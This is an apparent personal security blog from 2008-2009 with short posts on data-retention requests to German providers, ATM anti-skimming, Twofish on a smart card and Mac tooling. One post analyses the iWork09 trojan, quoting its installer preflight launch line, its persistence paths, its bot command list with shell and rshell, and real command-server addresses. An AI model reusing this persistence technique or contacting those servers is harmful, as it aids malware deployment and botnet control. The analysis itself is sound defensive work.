cordney*

Vorratsdaten her! – Ein Selbstversuch [2. Update]

cordney* — Mon, 31 Aug 2009 12:30:38 +0000

Inspiriert durch eine Aktion der Grünen, habe ich bei meinen beiden Telekommunikationsprovidern im Selbstversuch einen Antrag auf Auskunft über die bei den Unternehmen von mir gespeicherten Daten gestellt. Grundlage dafür ist §34 Bundesdatenschutzgesetz (BDSG), der Verbrauchern eine Auskunftsmöglichkeit gegenüber Unternehmen bietet.

Interessant ist vor allem der Aspekt der Auskunft über die im Rahmen der Vorratsdatenspeicherung durch die Provider 6 Monate vorgehaltenen Daten. Der Inhalt der Daten wäre mal sehr interessant. Ich bin mal gespannt wie die beiden betroffenen Unternehmen in meinem Fall reagieren.

Wenn’s was neues gibt, gibts das hier zu lesen.

1. Update:
Gestern hat zuerst Simyo auf meine Anfrage reagiert. Man teilte mir mit, welche Kundenstammdaten man von mir vorhält und auch das sie an ein Unternehmen namens arvato Service GmbH in Gütersloh zum Zweck der Auftragsdatenverarbeitung ausgelagert sind. Das ganze Schreiben gibts hier zu lesen.
Auf meine Auskunft nach den im Rahmen der gesetzlich vorgeschriebenen Vorratsdatenspeicherung erhobenen Daten sowohl nach der Art der Daten und den Daten selbst und der Auskunft nach den technischen und organisatorischen Maßnahmen zum Schutz meiner persönlichen Daten ging man jedoch nicht ein. Dahingehend werde ich in den nächsten Tagen noch einmal eine gezielte Anfrage an Simyo stellen. Unitymedia hat meine Anfrage bisher nicht beantwortet.

2. Update:
Nun hat auch Unitymedia reagiert, und das sogar wesentlich ausführlicher als Simyo. Das ganze Schreiben gibts hier zu lesen.
Dabei geht Unitymedia auch auf die Anfrage zur Vorratsdatenspeicherung und auf die technischen Maßnahmen zum Schutz der persönlichen Daten ein.
Zu Punkt 1 heisst es:

[...] Auf Grund des entstehenden Aufwandes nehmen wir von einer freiwilligen Beauskunftung der im Rahmen der Vorratsdatenspeicherung nach § 113a TKG anfallenden Verbindungsdaten Abstand. Eine Pflicht zur Beauskunftung besteht nach § 34 Abs. 4 BDSG nicht.

Mit letzterem Satz habe ich gerechnet. Interessant ist allerdings, dass sie von einer freiwilligen Auskunft sprechen, aber ihnen der Aufwand zu hoch ist. Welcher Aufwand ist das? Die Datenmenge? Jemanden die Festplatte mit meinem Namen drauf aus dem Rack ziehen lassen? Es ist doch so, dass das Unternehmen den Strafermittlungsbehörden eine Schnittstelle zur Abfrage der Daten zur Verfügung stellen muss. Da die Strafermittler meist allerdings technisch nicht so tief in der Materie drin sind, muss diese Schnittstelle doch recht einfach gestaltet sein. Wo ist dann der Aufwand? Sollte man nochmal nachhaken.

Zu Punkt 2 heisst es:

Der Schutz der unternehmensrelevanten Daten, zu denen selbstverständlich die Kundendaten gehören, und IT-Systemen ist Unitymedia ein wichtiges Anliegen. Daher werden zahlreiche technische und organisatorische Maßnahmen zur IT-Sicherheit, insbesondere auch zum Zutritts-, Zugangs- und Zugriffsschutz, getroffen. Nähere Auskünfte hierüber können wir jedoch aus Sicherheitsgründen nicht erteilen; zudem begründet § 34 BDSG keinen solchen Anspruch.

Zurecht begründet § 34 BDSG keinen solchen Auskunftsanspruch, ist ja Firmengeheimnis. Naja, ein Versuch war es wert.

Da mich vorläufige Ergebnis nicht zufrieden stellt, werde ich bei beiden Unternehmen noch einmal nachhaken.

iWork/CS4 Trojan In-Depth Analysis

cordney* — Tue, 27 Jan 2009 15:05:07 +0000

Last week’s Intego trojan alert caught quite a bit of attention in the Mac community and was captured on probably every IT-News site around the world. As this might be the first really serious trojan to threat Mac OS X users, let’s go and try to analyze it.

First, this is a Universal Binary, so it affects Macs both running on Intel- and PowerPC processors.

The SHA-1 fingerprint of iworkservices is 55d754b95ab9b34bdd848300045c3e11caf67ecf.

The iWork09 package is basically a repackaged version of the iWork09 Trial download from apple.com with a serial to unlock it included. To add their trojan/backdoor to the package, they had to do some work first.

What you see is the content of the iWork09Trial.mpkg install package. Both Info.plist and iWorkTrial.dist control the behaviour of the installation process of the whole package. Sub-packages are listed here.

from the Info.plist

from the iWorkTrial.dist

Now, the iWorkServices.pkg install package contains the usual files created by Apple’s Package Maker, a pretty nifty, straightforward and GUI-based tool for creating installation packages for Mac OS X*.
*Available from within the Developer Tools.

The interesting files here are preflight, a script which is executed by the installer prior to the actual program install, and iworkservices, which is the trojan itself.
#!/bin/sh "$1/Contents/Resources/iworkservices" &
The preflight script simply executes the trojan in a shell, where $1 is just a placeholder for the on-disk path to the install package.

Now comes the interesting part. Running otool revealed that it’s not an Objective-C, but a C/C++ program. Furthermore, running strings on iworkservices yields some details of the trojan’s behaviour.

__dyld_make_delayed_module_initializer_calls __dyld_mod_term_funcs /usr/lib/libSystem.B.dylib __cxa_atexit __cxa_finalize atexit /System/Library/StartupItems/iWorkServices /usr/bin/iWorkServices cp %s %s /System/Library/StartupItems/iWorkServices/StartupParameters.plist /System/Library/StartupItems/iWorkServices/iWorkServices chmod 755 /System/Library/StartupItems/iWorkServices/iWorkServices Description = "iWorkServices"; Provides = ("iWorkServices"); Requires = ("Network"); OrderPreference = "None"; #!/bin/sh /usr/bin/iWorkServices & iWorkServices socks system httpget httpgeted rand sleep banadd banclear p2plock p2punlock nodes leafs unknowns p2pport p2pmode p2ppeer p2ppeerport p2ppeertype clear p2pihistsize p2pihist platform script sendlogs uptime shell rshell GET %s HTTP/1.0 GET %s HTTP/1.0 Host: %s Accept: text/html Content-Length /tmp/.iWorkServices p2pnodes %s:%d /dev/urandom %.2X http:// PANIC: unprotected error in call to Lua API (%s) [...]
excerpt from the output of strings, see full output here

As you can see, it first copies itself to /System/Library/StartupItems/iWorkServices and /usr/bin/iWorkServices, creates a StartupParameters.plist configuration file, sets rwxr-xr-x permissions on the executeable and finally runs itself from within /usr/bin/iWorkServices. Note the Requires = (“Network”); line in the configuration file which means the Startup Item will be launched by launchd when network connection is available.

As some people already found out, this trojan is actually a bot program. The commands which your bot may receive from the master server are listed below.
socks system httpget httpgeted rand sleep banadd banclear p2plock p2punlock nodes leafs unknowns p2pport p2pmode p2ppeer p2ppeerport p2ppeertype clear p2pihistsize p2pihist platform script sendlogs uptime shell rshell p2pnodes

So this looks like it’s a Peer-to-Peer botnet. When started, it connects to the master server(s) serving at 69.92.177.146:59201 and qwfojzlk.freehostia.com:1024 using HTTP and downloads a list of all other p2p nodes to /tmp/.iWorkServices.
GET %s HTTP/1.0 GET %s HTTP/1.0 Host: %s Accept: text/html Content-Length /tmp/.iWorkServices p2pnodes %s:%d /dev/urandom %.2X

http://

Right after that it’ll go to sleep until it receives commands from the master server.

What’s also interesting is the mentioning of the Lua API.
PANIC: unprotected error in call to Lua API (%s)
Lua is powerful but yet small embeddable scripting language. It seems the bad guys are making their life easier, too.

Disassembling the whole trojan gave about 43,000 lines of code, but this probably includes the Lua API set. If someone has left some spare time, grab the code here.

According to Intego, as of 22., Jan 20,000 people already downloaded this pirated copy. So we have a botnet of 20,000+ Macs supposedly already running DDOS attacks against some sites using a PHP script.

If anyone is investigating this botnet a little further, please let me know.
Thanks go to Methusela Cebrian Ferrer from iThreats for the initial sight into the trojan.

Banken wehren sich gegen Skimming-Angriffe

cordney* — Wed, 01 Oct 2008 18:46:31 +0000

Überrascht, nein – besser überrumpelt, stand ich letzte Woche vor dem Geldautomaten meiner Bank. Denn vor dem Kartenlesegerät des Automaten war ein zusätzliches Gerät angebracht mit einem grünen Schloss-Symbol darauf (Bild s.u.).

Aufgrund der vielen Manipulationen an Geldautomaten in letzter Zeit ist man natürlich vorsichtig geworden, also holte ich die Karte wieder aus dem Automaten und rief meine Bank an. Nach kurzer Nachfrage bei einer anderen Abteilung gab man mir dann Entwarnung. Das Gerät sei eine zusätzliche Sicherheitsmaßnahme, die weiteren Manipulationen vorbeugen soll. Man bedankte sich aber dafür, dass ich mich gemeldet habe. Man versprach auch einen Aushang zu machen, damit andere Kunden darüber informiert sind.

Nach weiteren Recherchen entpuppte sich das Gerät als “Anti-Skimming Modul”, ein Gerät, dass Manipulationen erkennen kann und dann entsprechend reagiert.

Wie das Ganze funktionieren soll, will man jedoch nicht sagen. Geheimniskrämerei wenn’s um Sicherheit geht – da war doch was. Sollte jemand Insiderwissen haben, immer her damit! Werde bei Gelegenheit nochmal meine Professoren dazu befragen. Mittlerweile aber suchen sich die Betrüger einen anderen Weg um die Karten zu kopieren. Sie manipulieren einfach andere Lesegeräte – nämlich die Lesegeräte für die Zugangskontrolle am Eingang zur Filiale. Auch darauf reagierten die meisten Banken – und montierten diese Lesegeräte gleich komplett ab.

Bleibt abzuwarten ob die Bemühungen der Banken fruchten.

We made third! or Twofish on a smart card

cordney* — Wed, 16 Jul 2008 16:36:13 +0000

In a practical course this summer term the task was to implement the twofish block-cipher, a former AES candidate, on an embedded device, a smart card with an ATMega163 microcontroller on board. A prize was promised for the team that has the best performance based on clock cycles per key schedule/encryption/decryption and code size. 3 weeks of time were given, 10 teams participated and we made third, yeah!

In particular, the main decision was to handle the S-Boxes. The S-Box keys are derived from the main key and can be precomputed. So the main questions was whether we save clock cycles and precompute them or compute them on-the-fly while running enrcyption/decryption and save SRAM in the microcontroller. We decided to precompute them, as this would bring our implementation a significant performance increase.

These are the statistics..

Statistics Diagram

Statistics Table

Im Westen nichts neues..

cordney* — Thu, 05 Jun 2008 14:33:44 +0000

..aber interessante Zahlen! So könnte man den heutigen HGI-Vortrag zusammenfassen. Zu Gast war der Chef der Security Labs der G DATA Software AG, einem in Bochum beheimateten IT-Sicherheits Softwarehaus, das für Privat- und Geschäftskunden u.a. Anti-Viren Software anbietet.

Das Thema des Vortrags “Schadcode im Internet” wurde zu Beginn gleich in “Schadcode in Webseiten” umbenannt, denn darum ging es im Vortrag eigentlich. Begonnen wurde zugleich mit den beiden aktuell am weitesten verbreiteten Infektionsmethoden: Direct Downloads und Drive-by-Downloads. Das ist für Sicherheitsspezialisten sicher nichts Neues, wenn man jedoch bedenkt, dass noch vor einem Jahr der bekannteste Weg der Infektion verseuchte E-Mail Anhänge waren, die jetzt so gut wie nicht mehr auftreten, sieht man die Weiterentwicklung der Schutztechniken in E-Mail Programmen nun deutlich. Die Angreifer haben sich ein leichteres Angriffsziel gesucht: Den Browser.

Nun aber zu den interessanten Zahlen (ca-Werte):

10-12 Mio. Bots sind weltweit aktiv
30.000 neue Bots kommen täglich hinzu
Über 80% des Spams kommt von etwa 200 Organisationen
10.000 Webseiten-Defacements pro Tag
3000 DDoS-Angriffe pro Tag! (seit Anfang des Jahres stetig steigend)

Insgesamt ein recht interessanter Vortrag, wenn auch etwas zu wenig detailliert, aber mit Malware kann man auch Abende füllen!

Smart Card Readers for Mac OS X

cordney* — Wed, 21 May 2008 13:40:02 +0000

Getting non-standard hardware to work is not that easy. The first thing you’ll do is searching the internet for devices reported to work flawlessly with Mac OS X. This came up on me when looking for compatible Smart Card Readers. This is just an example for this “finding the needle in the haystack”. Normally, also Apple provides no hints on working devices. But for Smart Card Readers I accidentally found a note in an Apple document which lists compatible readers for Mac OS X. I hope this blogpost lists up #1 on Google soon.

Compatible Smart Card Readers:
Mac OS X Tiger includes built-in support for many types of smart card readers.
Compatible smart card readers include:
* Any certified Chip Card Interface Device (CCID) USB class reader
* USB readers such as Athena, CryptoCard, GemPlus, and SCM
* PC Card readers such as CryptoCard, SCM, and OmniKey
* USB dongle readers such as OmniKey and GemPlus

Source: Apple Smart Card Setup Guide

Tags: smartcard, apple, usb reader, reader, compatible

Tunnelblick for Leopard

cordney* — Wed, 14 May 2008 11:16:32 +0000

While setting up a simple VPN with OpenVPN I had to get a Leopard compatible version of Tunnelblick, a GUI openVPN client. Unfortunately the maintainer had some trouble getting it to work with Leopard and the latest version is still very buggy.
Luckily someone from the Mozilla dev team fixed it and it works fine now in 10.5.

link

Thanks, ~~John~~ Justin!

Apple developers definitely have a sense of humor

cordney* — Tue, 13 May 2008 22:27:17 +0000

from the system log:

[paper] On the security of Linux user passwords

cordney* — Fri, 25 Apr 2008 16:52:50 +0000

This is a paper I wrote for one of my courses at university.

From the abstract:
In this paper we determine the security of user passwords on Linux
based operating systems. We have a look at the two basic security mech-
anisms passwords are created and stored using a reference Linux distri-
bution, locate common attack vectors and propose available countermea-
sures.

link to paper

Extending the 4 primitives of cryptography

cordney* — Sun, 20 Apr 2008 22:48:47 +0000

Dealing with all these new technologies like e-passport, the e-healt card, voting machines etc, I strongly encourage extending the 4 primitives of cryptography (and data security, from my point of view):

traditional primitives of cryptography:

confidentiality
authenticity
integrity
non-repudiation

proposal of an extension to the 4 primitives:

privacy
non-traceability
non-linkability